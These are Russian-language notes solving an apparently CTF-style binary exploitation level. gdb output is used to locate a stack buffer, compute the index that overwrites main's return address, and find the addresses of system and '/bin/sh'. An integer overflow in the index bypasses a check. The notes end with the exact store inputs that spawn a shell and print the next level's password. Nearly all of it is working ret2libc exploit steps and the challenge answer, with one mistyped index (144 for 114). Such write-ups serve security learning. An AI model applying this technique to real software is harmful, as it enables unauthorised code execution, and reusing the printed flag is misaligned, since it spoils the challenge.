смотрим на какое место памяти записывает. Можем записать что угодно 
перезаписываем адрес возврата
вычисляем индекс. Он 114
выясняем адрес system and bin/sh

Breakpoint 2, 0x080486c2 in store_number () before store number

наш буффер 0x8(%ebp)

(gdb) x/10xw $ebp+0x8  
0xffffd4f0:	0xffffd514	0x00000014	0xf7fcfac0	0xf7fdc714
0xffffd500:	0x00000098	0xffffffff	0xffffd7d4	0xffffd778
0xffffd510:	0x00000000	0x00000000

0xffffd514 -- начало нашего стека.
Значит i индекс заполняет адрес 0xffffd514+i*4

будем перезаписывать адрес возврата main
Чтоб его узнать:
http://natalia.appmat.ru/c&c++/assembler.html

Breakpoint 6, 0x080489f1 in main ()
(gdb) i reg $esp
esp            0xffffd6dc	0xffffd6dc

Переписать на что? на system with bin/sh
1. находим адрес system 
    (gdb) info func system
    All functions matching regular expression "system":

    Non-debugging symbols:
    0xf7e6aed0  __libc_system
    0xf7e6aed0  system
    0xf7f48a50  svcerr_systemerr
2.находим
(gdb) find &system,+99999999,"/bin/sh"
0xf7f897ec


В какой индекс надо записать?
(0xffffd6dc - 0xffffd514) / 4 = 0x72 = 114 (= 0 mod 3) 
    Т.е. index = 144 (+ переполнение 2147483648+114 = 2147483762)

Что записать? 
    0xf7e6aed0 = 4159090384 
    0xf7f897ec = 4160264172
переполняем инт


ОТВЕТ: 

Input command: store
 Number: 4159090384
 Index: 2147483762
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
$

